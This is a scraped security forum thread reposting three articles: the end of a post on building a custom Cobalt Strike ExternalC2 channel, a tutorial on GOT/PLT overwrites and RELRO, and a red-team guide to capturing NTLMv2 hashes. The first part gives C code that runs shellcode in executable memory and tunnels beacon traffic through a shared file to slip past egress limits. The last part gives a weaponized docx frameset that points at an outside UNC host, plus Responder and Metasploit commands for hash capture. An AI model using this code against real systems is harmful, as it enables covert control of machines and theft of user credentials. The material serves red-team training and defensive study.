*)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (alloc == NULL) return; memcpy(alloc, payload, len); threadHandle = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)alloc, NULL, 0, &threadId); Once the SMB Beacon is up and running, we need to connect to its named pipe. To do this, we will just repeatedly attempt to connect to our \\.\pipe\xpntest pipe (remember, this pipename was passed as an option earlier on, and will be used by the SMB Beacon to receive commands): // Loop until the pipe is up and ready to use while (beaconPipe == INVALID_HANDLE_VALUE) { // Create our IPC pipe for talking to the C2 beacon Sleep(500); beaconPipe = connectBeaconPipe("\\\\.\\pipe\\xpntest"); } And then, once we have a connection, we can continue with our send/recv loop: while (true) { // Start the pipe dance payloadData = recvFromBeacon(beaconPipe, &payloadLen); if (payloadLen == 0) break; sendData(c2socket, payloadData, payloadLen); free(payloadData); payloadData = recvData(c2socket, &payloadLen); if (payloadLen == 0) break; sendToBeacon(beaconPipe, payloadData, payloadLen); free(payloadData); } And that’s it, we have the basics of our ExternalC2 service set up. The full code for the Third-Party Client can be found here. Now, onto something a bit more interesting. Transfer C2 over file Let’s recap on what it is we control when attempting to create a custom C2 protocol: From here, we can see that the data transfer between the Third-Party Controller and Third-Party Client is where we get to have some fun. Taking our previous "Hello World" example, let’s attempt to port this into something a bit more interesting, transferring data over a file read/write. Why would we want to do this? Well, let’s say we are in a Windows domain environment and compromise a machine with very limited outbound access. One thing that is permitted however is access to a file share... see where I’m going with this By writing C2 data from a machine with access to our C2 server into a file on the share, and reading the data from the firewall’d machine, we have a way to run our Cobalt Strike beacon. Let’s think about just how this will look: Here we have actually introduced an additional element, which essentially tunnels data into and out of the file, and communicates with the Third Party Controller. Again, for the purposes of this example, our communication between the Third-Party Controller and the "Internet Connected Host" will use the familiar 4 byte length prefix protocol, so there is no reason to modify our existing Python Third-Party Controller. What we will do however, is split our previous Third-Party Client into 2 parts. One which is responsible for running on the "Internet Connected Host", receiving data from the Third-Party Controller and writing this into a file. The second, which runs from the "Restricted Host", reads data from the file, spawns the SMB Beacon, and passes data to this beacon. I won't go over the elements we covered above, but I'll show one way the file transfer can be achieved. First, we need to create the file we will be communicating over. For this we will just use CreateFileA, however we must ensure that the FILE_SHARE_READ and FILE_SHARE_WRITEoptions are provided. This will allow both sides of the Third-Party Client to read and write to the file simultaneously: HANDLE openC2FileServer(const char *filepath) { HANDLE handle; handle = CreateFileA(filepath, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (handle == INVALID_HANDLE_VALUE) printf("Error opening file: %x\n", GetLastError()); return handle; } Next, we need a way to serialising our C2 data into the file, as well as indicating which of the 2 clients should be processing data at any time. To do this, a simple header can be used, for example: struct file_c2_header { DWORD id; DWORD len; }; The idea is that we simply poll on the id field, which acts as a signal to each Third-Party Client of who should be reading and who writing data. Putting together our file read and write helpers, we have something that looks like this: void writeC2File(HANDLE c2File, const char *data, DWORD len, int id) { char *fileBytes = NULL; DWORD bytesWritten = 0; fileBytes = (char *)malloc(8 + len); if (fileBytes == NULL) return; // Add our file header *(DWORD *)fileBytes = id; *(DWORD *)(fileBytes+4) = len; memcpy(fileBytes + 8, data, len); // Make sure we are at the beginning of the file SetFilePointer(c2File, 0, 0, FILE_BEGIN); // Write our C2 data in WriteFile(c2File, fileBytes, 8 + len, &bytesWritten, NULL); printf("[*] Wrote %d bytes\n", bytesWritten); } char *readC2File(HANDLE c2File, DWORD *len, int expect) { char header[8]; DWORD bytesRead = 0; char *fileBytes = NULL; memset(header, 0xFF, sizeof(header)); // Poll until we have our expected id in the header while (*(DWORD *)header != expect) { SetFilePointer(c2File, 0, 0, FILE_BEGIN); ReadFile(c2File, header, 8, &bytesRead, NULL); Sleep(100); } // Read out the expected length from the header *len = *(DWORD *)(header + 4); fileBytes = (char *)malloc(*len); if (fileBytes == NULL) return NULL; // Finally, read out our C2 data ReadFile(c2File, fileBytes, *len, &bytesRead, NULL); printf("[*] Read %d bytes\n", bytesRead); return fileBytes; } Here we see that we are adding our header to the file, and read/writing C2 data into the file respectively. And that is pretty much all there is to it. All that is left to do is implement our recv/write/read/send loop and we have C2 operating across a file transfer. The full code for the above Third-Party Controller can be found here. Let's see this in action: If you are interested in learning more about ExternalC2, there are a number of useful resources which can be found over at the Cobalt Strike ExternalC2 help page, https://www.cobaltstrike.com/help-externalc2. Sursa: https://blog.xpnsec.com/exploring-cobalt-strikes-externalc2-framework/
      • 2
      • Upvote
      • Thanks
  24. GOT and PLT for pwning. 19 Mar 2017 in Security Tags: Pwning, Linux So, during the recent 0CTF, one of my teammates was asking me about RELRO and the GOT and the PLT and all of the ELF sections involved. I realized that though I knew the general concepts, I didn’t know as much as I should, so I did some research to find out some more. This is documenting the research (and hoping it’s useful for others). All of the examples below will be on an x86 Linux platform, but the concepts all apply equally to x86-64. (And, I assume, other architectures on Linux, as the concepts are related to ELF linking and glibc, but I haven’t checked.) High-Level Introduction So what is all of this nonsense about? Well, there’s two types of binaries on any system: statically linked and dynamically linked. Statically linked binaries are self-contained, containing all of the code necessary for them to run within the single file, and do not depend on any external libraries. Dynamically linked binaries (which are the default when you run gcc and most other compilers) do not include a lot of functions, but rely on system libraries to provide a portion of the functionality. For example, when your binary uses printf to print some data, the actual implementation of printf is part of the system C library. Typically, on current GNU/Linux systems, this is provided by libc.so.6, which is the name of the current GNU Libc library. In order to locate these functions, your program needs to know the address of printf to call it. While this could be written into the raw binary at compile time, there’s some problems with that strategy: Each time the library changes, the addresses of the functions within the library change, when libc is upgraded, you’d need to rebuild every binary on your system. While this might appeal to Gentoo users, the rest of us would find it an upgrade challenge to replace every binary every time libc received an update. Modern systems using ASLR load libraries at different locations on each program invocation. Hardcoding addresses would render this impossible. Consequently, a strategy was developed to allow looking up all of these addresses when the program was run and providing a mechanism to call these functions from libraries. This is known as relocation, and the hard work of doing this at runtime is performed by the linker, aka ld-linux.so. (Note that every dynamically linked program will be linked against the linker, this is actually set in a special ELF section called .interp.) The linker is actually run before any code from your program or libc, but this is completely abstracted from the user by the Linux kernel. Relocations Looking at an ELF file, you will discover that it has a number of sections, and it turns out that relocations require several of these sections. I’ll start by defining the sections, then discuss how they’re used in practice. .got This is the GOT, or Global Offset Table. This is the actual table of offsets as filled in by the linker for external symbols. .plt This is the PLT, or Procedure Linkage Table. These are stubs that look up the addresses in the .got.plt section, and either jump to the right address, or trigger the code in the linker to look up the address. (If the address has not been filled in to .got.plt yet.) .got.plt This is the GOT for the PLT. It contains the target addresses (after they have been looked up) or an address back in the .plt to trigger the lookup. Classically, this data was part of the .got section. .plt.got It seems like they wanted every combination of PLT and GOT! This just seems to contain code to jump to the first entry of the .got. I’m not actually sure what uses this. (If you know, please reach out and let me know! In testing a couple of programs, this code is not hit, but maybe there’s some obscure case for this.) TL;DR: Those starting with .plt contain stubs to jump to the target, those starting with .got are tables of the target addresses. Let’s walk through the way a relocation is used in a typical binary. We’ll include two libc functions: puts and exit and show the state of the various sections as we go along. Here’s our source: 1 2 3 4 5 6 7 8 9 // Build with: gcc -m32 -no-pie -g -o plt plt.c #include <stdio.h> #include <stdlib.h> int main(int argc, char **argv) { puts("Hello world!"); exit(0); } Let’s examine the section headers: 1 2 3 4 5 6 7 8 9 There are 36 section headers, starting at offset 0x1fb4: Section Headers: [Nr] Name Type Addr Off Size ES Flg Lk Inf Al [12] .plt PROGBITS 080482f0 0002f0 000040 04 AX 0 0 16 [13] .plt.got PROGBITS 08048330 000330 000008 00 AX 0 0 8 [14] .text PROGBITS 08048340 000340 0001a2 00 AX 0 0 16 [23] .got PROGBITS 08049ffc 000ffc 000004 04 WA 0 0 4 [24] .got.plt PROGBITS 0804a000 001000 000018 04 WA 0 0 4 I’ve left only the sections I’ll be talking about, the full program is 36 sections! So let’s walk through this process with the use of GDB. (I’m using the fantastic GDB environment provided by pwndbg, so some UI elements might look a bit different from vanilla GDB.) We’ll load up our binary and set a breakpoint just before puts gets called and then examine the flow step-by-step: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 pwndbg> disass main Dump of assembler code for function main: 0x0804843b <+0>: lea ecx,[esp+0x4] 0x0804843f <+4>: and esp,0xfffffff0 0x08048442 <+7>: push DWORD PTR [ecx-0x4] 0x08048445 <+10>: push ebp 0x08048446 <+11>: mov ebp,esp 0x08048448 <+13>: push ebx 0x08048449 <+14>: push ecx 0x0804844a <+15>: call 0x8048370 <__x86.get_pc_thunk.bx> 0x0804844f <+20>: add ebx,0x1bb1 0x08048455 <+26>: sub esp,0xc 0x08048458 <+29>: lea eax,[ebx-0x1b00] 0x0804845e <+35>: push eax 0x0804845f <+36>: call 0x8048300 <puts@plt> 0x08048464 <+41>: add esp,0x10 0x08048467 <+44>: sub esp,0xc 0x0804846a <+47>: push 0x0 0x0804846c <+49>: call 0x8048310 <exit@plt> End of assembler dump. pwndbg> break *0x0804845f Breakpoint 1 at 0x804845f: file plt.c, line 7. pwndbg> r Breakpoint *0x0804845f pwndbg> x/i $pc => 0x804845f <main+36>: call 0x8048300 <puts@plt> Ok, we’re about to call puts. Note that the address being called is local to our binary, in the .pltsection, hence the special symbol name of puts@plt. Let’s step through the process until we get to the actual puts function. 1 2 3 pwndbg> si pwndbg> x/i $pc => 0x8048300 <puts@plt>: jmp DWORD PTR ds:0x804a00c We’re in the PLT, and we see that we’re performing a jmp, but this is not a typical jmp. This is what a jmp to a function pointer would look like. The processor will dereference the pointer, then jump to resulting address. Let’s check the dereference and follow the jmp. Note that the pointer is in the .got.plt section as we described above. 1 2 3 4 5 6 7 pwndbg> x/wx 0x804a00c 0x804a00c: 0x08048306 pwndbg> si 0x08048306 in puts@plt () pwndbg> x/2i $pc => 0x8048306 <puts@plt+6>: push 0x0 0x804830b <puts@plt+11>: jmp 0x80482f0 Well, that’s weird. We’ve just jumped to the next instruction! Why has this occurred? Well, it turns out that because we haven’t called puts before, we need to trigger the first lookup. It pushes the slot number (0x0) on the stack, then calls the routine to lookup the symbol name. This happens to be the beginning of the .plt section. What does this stub do? Let’s find out. 1 2 3 4 5 pwndbg> si pwndbg> si pwndbg> x/2i $pc => 0x80482f0: push DWORD PTR ds:0x804a004 0x80482f6: jmp DWORD PTR ds:0x804a008 Now, we push the value of the second entry in .got.plt, then jump to the address stored in the third entry. Let’s examine those values and carry on. 1 2 pwndbg> x/2wx 0x804a004 0x804a004: 0xf7ffd918 0xf7fedf40 Wait, where is that pointing? It turns out the first one points into the data segment of ld.so, and the 2nd into the executable area: 1 2 3 0xf7fd9000 0xf7ffb000 r-xp 22000 0 /lib/i386-linux-gnu/ld-2.24.so 0xf7ffc000 0xf7ffd000 r--p 1000 22000 /lib/i386-linux-gnu/ld-2.24.so 0xf7ffd000 0xf7ffe000 rw-p 1000 23000 /lib/i386-linux-gnu/ld-2.24.so Ah, finally, we’re asking for the information for the puts symbol! These two addresses in the .got.plt section are populated by the linker/loader (ld.so) at the time it is loading the binary. So, I’m going to treat what happens in ld.so as a black box. I encourage you to look into it, but exactly how it looks up the symbols is a little bit too low level for this post. Suffice it to say that eventually we will reach a ret from the ld.so code that resolves the symbol. 1 2 3 4 5 pwndbg> x/i $pc => 0xf7fedf5b: ret 0xc pwndbg> ni pwndbg> info symbol $pc puts in section .text of /lib/i386-linux-gnu/libc.so.6 Look at that, we find ourselves at puts, exactly where we’d like to be. Let’s see how our stack looks at this point: 1 2 3 4 pwndbg> x/4wx $esp 0xffffcc2c: 0x08048464 0x08048500 0xffffccf4 0xffffccfc pwndbg> x/s *(int *)($esp+4) 0x8048500: "Hello world!" Absolutely no trace of the trip through .plt, ld.so, or anything but what you’d expect from a direct call to puts. Unfortunately, this seemed like a long trip to get from main to puts. Do we have to go through that every time? Fortunately, no. Let’s look at our entry in .got.plt again, disassembling puts@plt to verify the address first: 1 2 3 4 5 6 7 8 9 10 pwndbg> disass 'puts@plt' Dump of assembler code for function puts@plt: 0x08048300 <+0>: jmp DWORD PTR ds:0x804a00c 0x08048306 <+6>: push 0x0 0x0804830b <+11>: jmp 0x80482f0 End of assembler dump. pwndbg> x/wx 0x804a00c 0x804a00c: 0xf7e4b870 pwndbg> info symbol 0xf7e4b870 puts in section .text of /lib/i386-linux-gnu/libc.so.6 So now, a call puts@plt results in a immediate jmp to the address of puts as loaded from libc. At this point, the overhead of the relocation is one extra jmp. (Ok, and dereferencing the pointer which might cause a cache load, but I suspect the GOT is very often in L1 or at least L2, so very little overhead.) How did the .got.plt get updated? That’s why a pointer to the beginning of the GOT was passed as an argument back to ld.so. ld.so did magic and inserted the proper address in the GOT to replace the previous address which pointed to the next instruction in the PLT. Pwning Relocations Alright, well now that we think we know how this all works, how can I, as a pwner, make use of this? Well, pwning usually involves taking control of the flow of execution of a program. Let’s look at the permissions of the sections we’ve been dealing with: 1 2 3 4 5 6 7 8 9 10 Section Headers: [Nr] Name Type Addr Off Size ES Flg Lk Inf Al [12] .plt PROGBITS 080482f0 0002f0 000040 04 AX 0 0 16 [13] .plt.got PROGBITS 08048330 000330 000008 00 AX 0 0 8 [14] .text PROGBITS 08048340 000340 0001a2 00 AX 0 0 16 [23] .got PROGBITS 08049ffc 000ffc 000004 04 WA 0 0 4 [24] .got.plt PROGBITS 0804a000 001000 000018 04 WA 0 0 4 Key to Flags: W (write), A (alloc), X (execute), M (merge), S (strings), I (info), We’ll note that, as is typical for a system supporting NX, no section has both the Write and eXecute flags enabled. So we won’t be overwriting any executable sections, but we should be used to that. On the other hand, the .got.plt section is basically a giant array of function pointers! Maybe we could overwrite one of these and control execution from there. It turns out this is quite a common technique, as described in a 2001 paper from team teso. (Hey, I never said the technique was new.) Essentially, any memory corruption primitive that will let you write to an arbitrary (attacker-controlled) address will allow you to overwrite a GOT entry. Mitigations So, since this exploit technique has been known for so long, surely someone has done something about it, right? Well, it turns out yes, there’s been a mitigation since 2004. Enter relocations read-only, or RELRO. It in fact has two levels of protection: partial and full RELRO. Partial RELRO (enabled with -Wl,-z,relro): Maps the .got section as read-only (but not .got.plt) Rearranges sections to reduce the likelihood of global variables overflowing into control structures. Full RELRO (enabled with -Wl,-z,relro,-z,now): Does the steps of Partial RELRO, plus: Causes the linker to resolve all symbols at link time (before starting execution) and then remove write permissions from .got. .got.plt is merged into .got with full RELRO, so you won’t see this section name. Only full RELRO protects against overwriting function pointers in .got.plt. It works by causing the linker to immediately look up every symbol in the PLT and update the addresses, then mprotect the page to no longer be writable. Summary The .got.plt is an attractive target for printf format string exploitation and other arbitrary write exploits, especially when your target binary lacks PIE, causing the .got.plt to be loaded at a fixed address. Enabling Full RELRO protects against these attacks by preventing writing to the GOT. References ELF Format Reference Examining Dynamic Linking with GDB RELRO - A (not so well known) Memory Corruption Mitigation Technique What is the symbol and the global offset table? How the ELF ruined Christmas Sursa: https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html
  25. Microsoft Office – NTLM Hashes via Frameset December 18, 2017 Microsoft office documents are playing a vital role towards red team assessments as usually they are used to gain some initial foothold on the client’s internal network. Staying under the radar is a key element as well and this can only be achieved by abusing legitimate functionality of Windows or of a trusted application such as Microsoft office. Historically Microsoft Word was used as an HTML editor. This means that it can support HTML elements such as framesets. It is therefore possible to link a Microsoft Word document with a UNC path and combing this with responder in order to capture NTLM hashes externally. Word documents with the docx extension are actually a zip file which contains various XML documents. These XML files are controlling the theme, the fonts, the settings of the document and the web settings. Using 7-zip it is possible to open that archive in order to examine these files: Docx Contents The word folder contains a file which is called webSettings.xml. This file needs to be modified in order to include the frameset. webSettings File Adding the following code will create a link with another file. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 <w:frameset> <w:framesetSplitbar> <w:w w:val="60"/> <w:color w:val="auto"/> <w:noBorder/> </w:framesetSplitbar> <w:frameset> <w:frame> <w:name w:val="3"/> <w:sourceFileName r:id="rId1"/> <w:linkedToFile/> </w:frame> </w:frameset> </w:frameset> webSettings XML – Frameset The new webSettings.xml file which contains the frameset needs to be added back to the archive so the previous version will be overwritten. webSettings with Frameset – Adding new version to archive A new file (webSettings.xml.rels) must be created in order to contain the relationship ID (rId1) the UNC path and the TargetMode if it is external or internal. 1 2 3 4 5 <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"> <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\192.168.1.169\Microsoft_Office_Updates.docx" TargetMode="External"/> </Relationships> webSettings XML Relationship File – Contents The _rels directory contains the associated relationships of the document in terms of fonts, styles, themes, settings etc. Planting the new file in that directory will finalize the relationship link which has been created previously via the frameset. webSettings XML rels Now that the Word document has been weaponized to connect to a UNC path over the Internet responder can be configured in order to capture the NTLM hashes. 1 responder -I wlan0 -e 192.168.1.169 -b -A -v Responder Configuration Once the target user open the word document it will try to connect to a UNC path. Word – Connect to UNC Path via Frameset Responder will retrieve the NTLMv2 hash of the user. Responder – NTLMv2 Hash via Frameset Alternatively Metasploit Framework can be used instead of Responder in order to capture the password hash. 1 auxiliary/server/capture/smb Metasploit – SMB Capture Module NTLMv2 hashes will be captured in Metasploit upon opening the document. Metasploit SMB Capture Module – NTLMv2 Hash via Frameset Conclusion This technique can allow the red team to grab domain password hashes from users which can lead to internal network access if 2-factor authentication for VPN access is not enabled and there is a weak password policy. Additionally if the target user is an elevated account such as local administrator or domain admin then this method can be combined with SMB relay in order to obtain a Meterpreter session. Sursa: https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/
      • 1
      • Upvote
×
×
  • Create New...